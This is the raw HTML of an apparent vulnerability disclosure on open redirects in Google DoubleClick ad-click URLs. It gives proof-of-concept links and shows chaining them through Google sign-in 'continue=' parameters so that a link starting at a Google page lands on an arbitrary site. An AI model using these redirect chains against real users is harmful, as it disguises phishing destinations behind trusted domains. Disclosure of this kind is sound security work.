<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ&client=<wbr></wbr>ca-pub-0466582109566532&adurl=<wbr></wbr>http://economics.wj.com</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>CWEQH6Q73UqW9CMvMigfdiIGoB9rlk<wbr></wbr>sIEAAAQASAAUO7kr-b8_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEggFP0<wbr></wbr>E-9agyjXkIfjOxmtpPE76hNCBn1in_<wbr></wbr>meKMn53O-<wbr></wbr>8ZFlbxWDgYdaVZQKJza8mIRXw22hWI<wbr></wbr>VMAOJJzq-S6AipWHe9iVZCAAlcHj-<wbr></wbr>gT2B33tD9a2oQrZ61S3-WFh_<wbr></wbr>8T8RFUFnC_PRC35CTFbueQrUYjC-<wbr></wbr>j6ncVXzt_IPXugo5vE-3x4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_<wbr></wbr>2petJH0A9Zjj45GN117ocBukiroA&<wbr></wbr>client=ca-pub-<wbr></wbr>0466582109566532&adurl=http://<wbr></wbr>www.tetraph.com/security</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ&client=<wbr></wbr>ca-pub-0466582109566532&adurl=<wbr></wbr>http://www.tetraph.com/<wbr></wbr>security</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Attackers can make the attack more powerful by chaining it through the following Google login URLs, whose continue= parameter accepts the googleads.g.doubleclick.net link as its target, so the link a victim sees starts at a Google sign-in page and still ends at the attacker's adurl= destination:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/ServiceLogin?<wbr></wbr>continue=https%3A%2F%2Fsites.<wbr></wbr>google.com%2Fsite%2Fissrabhi%<wbr></wbr>2Fhome&service=jotspot&<wbr></wbr>passive=true&ul=1</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D*" style="background-color: white;" target="_blank">https://accounts.google.com/<wbr></wbr>accounts/SetSID?ssdc=1&sidt=*&<wbr></wbr>continue=http%3A%2F%2Fwww.<wbr></wbr>orkut.com%2FRedirLogin%3Fmsg%<wbr></wbr>3D1%26auth%3D*</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/ServiceLogin?<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.tetraph.<wbr></wbr>com%2Fessaybeans%<wbr></wbr>2Freflections%2Fsolitude.html</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles" style="background-color: white;" target="_blank">https://accounts.google.com/<wbr></wbr>accounts/SetSID?ssdc=1&sidt=*&<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.diebiyi.<wbr></wbr>com%2Farticles</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1.2)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Google does block the same kind of redirection through hosts other than googleads.g.doubleclick.net; the following www.googleadservices.com links, for example, are not accepted as a continue= target, even though they carry an adurl= parameter of exactly the same shape:</span></div>
</div>
<div class="">
<div class="im">
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/" style="background-color: white;" target="_blank">http://www.googleadservices.<wbr></wbr>com/pagead/aclk?sa=L&ai=<wbr></wbr>C8u9OibgEU_<wbr></wbr>XIOKrNswfrzYDgAY2FhfgE1aLjnoYB<wbr></wbr>-7qSCxADILhPKANQrt2khP3_____<wbr></wbr>AWC_BaAB8-<wbr></wbr>vV0gPIAQGqBChP0AshNp656okgv3tS<wbr></wbr>xmgc3JZeuS25cM0HlW9wUqHwxL8nk7<wbr></wbr>5mFPqsgAf1k6otkAcB&num=3&val=<wbr></wbr>ChA2MWI5ODZkYzA4MTlmZmRlEN-<wbr></wbr>mlZgFGgghk-txLb-9bSABKAAwhPDs-<wbr></wbr>dD_xPHhATj6w5KYBUD6w5KYBQ&sig=<wbr></wbr>AOD64_<wbr></wbr>2f3wWGlepm4KMYlixE15qmjC1FGw&<wbr></wbr>adurl=http://freshservice.com/<wbr></wbr>free-service-desk/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10" style="background-color: white;" target="_blank">http://www.googleadservices.<wbr></wbr>com/pagead/aclk?sa=L&ai=<wbr></wbr>C6w2J2VL1UtqeFtPFsQe_<wbr></wbr>xICACOur9I0Gm4qOwXKd4q7LvAEQAi<wbr></wbr>C4TygCUPrp_p7______<wbr></wbr>wFgvwWgAY2TjcoDyAEBqQJGONe13HW<wbr></wbr>qPqoEIk_QksMhB61R5_EBc-<wbr></wbr>rRl0G3mUtOQjLemb4NjAETa6dj-<wbr></wbr>AGAB9vs8jWQBwE&num=2&val=<wbr></wbr>ChA5MDRhYzc4NjJiNjFlMzZlEO6g15<wbr></wbr>cFGgjqLoQCBAXi2SABKAAw6sfV44GF<wbr></wbr>7cZ_OMbI1ZcFQMbI1ZcF&sig=<wbr></wbr>AOD64_1g--<wbr></wbr>5hg2Tc0L5irweEKYqbh1FwSw&<wbr></wbr>adurl=https://www.singtelshop.<wbr></wbr>com/mobile/phone-details.jsf%<wbr></wbr>3FbrandId%3D122%26modelId%<wbr></wbr>3DZ10</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.2) Vulnerable URLs Related to DoubleClick.net.</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 1:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://<wbr></wbr>noteok.zdnet.com.cn/notebook/<wbr></wbr>2013/1113/2995493.shtml</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://www.<wbr></wbr>inzeed.com/kaleidoscope/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://www.<wbr></wbr>tetraph.com/security</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
